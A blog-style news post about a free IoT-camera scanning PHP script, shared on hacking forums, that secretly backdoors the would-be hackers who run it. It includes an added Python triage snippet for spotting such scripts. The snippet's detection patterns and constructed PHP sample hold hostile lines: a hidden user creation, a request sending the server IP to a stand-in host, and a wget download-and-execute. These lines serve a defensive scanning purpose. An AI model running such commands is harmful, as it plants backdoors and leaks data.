Submitted by Micah Smith on Mon, 01/15/2018 - 13:27
Hacking the hackers

We hear about government hacker teams going after each other in epic hacking matches, but do we ever hear of regular hackers doing the same? Could it be that the hackers are really trying to school other hackers or at least use them for their own purposes?

When hackers create malware and target others, they actually prefer to catch other hackers so they can take over their tools and use them. This was demonstrated this week by NewSky Security researcher Ankit Anubhav, who found a new PHP script being given away freely on several underground hacking forums.

The PHP script allowed anyone to find vulnerable IP cameras that are connected to the internet and infect them. It sounds like a gift to hackers, but nothing in life is entirely free, and the price paid here was that the PHP script contained a secret backdoor that allows its creator to hack the hacker.

It’s like phishing, or rather more like fishing. If you throw your hook in the water, you don’t care if you catch the big predators or the medium-sized guys. As long as you catch something, you feel some sense of satisfaction. Well, most of us do.

Here is how it works:

First, the user runs the code to scan for vulnerable cameras (its intended purpose). Then, the software secretly creates a backdoor user account with the same privileges as the wannabe hacker. Then the script extracts the IP address of the user and installs a botnet that completely controls the user’s entire system.
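For anyone who has to vet an untrusted script before it runs, the behaviours described above can be looked for statically. The following is an added example, not code from the original script or from the researcher; the indicator patterns, the sample PHP and names such as `triage_php` are assumptions constructed for illustration.

```python
import base64
import re

# Assumed indicator patterns for the behaviours the article describes;
# they are illustrative, not signatures taken from the actual script.
INDICATORS = {
    "account_creation": re.compile(r"\b(useradd|adduser|chpasswd|net\s+user\b.*?/add)", re.I),
    "ip_collection": re.compile(r"\$_SERVER\[\s*['\"](SERVER_ADDR|REMOTE_ADDR)['\"]\s*\]"),
    "download_and_run": re.compile(r"\b(wget|curl)\b[^\n;]*;\s*(chmod|sh|bash)\b", re.I),
    "shell_call": re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\("),
}
B64_CALL = re.compile(r"base64_decode\(\s*['\"]([A-Za-z0-9+/=]{8,})['\"]\s*\)")

def expand_base64(source, max_depth=3):
    """Return the source plus every decodable base64_decode('...') literal."""
    layers, pending = [("source", source)], [source]
    for depth in range(1, max_depth + 1):
        found = []
        for text in pending:
            for blob in B64_CALL.findall(text):
                try:
                    decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
                except ValueError:
                    continue  # not valid base64; leave it for manual review
                found.append(decoded)
                layers.append((f"decoded-layer-{depth}", decoded))
        pending = found
    return layers

def triage_php(source):
    """Map each indicator category to (layer, line_no, line) hits."""
    hits = {name: [] for name in INDICATORS}
    for layer, text in expand_base64(source):
        for line_no, line in enumerate(text.splitlines(), 1):
            for name, pattern in INDICATORS.items():
                if pattern.search(line):
                    hits[name].append((layer, line_no, line.strip()))
    return hits

# Constructed sample: a "scanner" whose advertised loop hides extra behaviour.
HIDDEN = base64.b64encode(b"useradd -m example_user").decode()
SAMPLE = f"""<?php
foreach ($targets as $ip) {{ check_camera($ip); }}
shell_exec(base64_decode('{HIDDEN}'));
file_get_contents('http://collector.example/?ip=' . $_SERVER['SERVER_ADDR']);
system('wget http://host.example/payload -O /tmp/p; chmod +x /tmp/p');
"""
```

A clean result from a pattern scan like this does not show a script is safe; hits only tell a reviewer which lines to read first.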

There is a huge advantage in doing this, for the real hacker of course. If he or she catches a small fish (a wannabe hacker) with a decent number of botnet devices, he or she can build a pretty big army and turn the robots against their human creators.

Or in the words of the researcher that found the secret backdoor: “if a script kiddie owns a botnet of 10,000 IoT and he gets hacked, the entire botnet is now in control of the attacker who got control of the system of this script kiddie. Hence, by exploiting one device, he can add thousands of botnets to his army”.

Apparently, putting malware inside of malware, or hacking the hacker, or any one of those tongue twisters, is a very common practice.

Back in September, a Cobian RAT builder kit was found to have a backdoor just like the one described above. In addition, last year there was a Facebook hacking tool called Remtasu that was supposed to use a Windows-based Trojan to access people's Facebook credentials but actually took on the cyber deviant himself.

So if you are planning to go hacker and you aren't truly experienced, beware of wolves disguised as friendly cyber sheep giving out 'free gifts'. The interest in hacking has become a phenomenon spreading throughout the ranks of cyber interest at every level of the food chain. The mainstream is moving slowly towards the hacker forums, and the cyber criminals, usually a few steps ahead, have taken notice and are playing these newbies at their own game.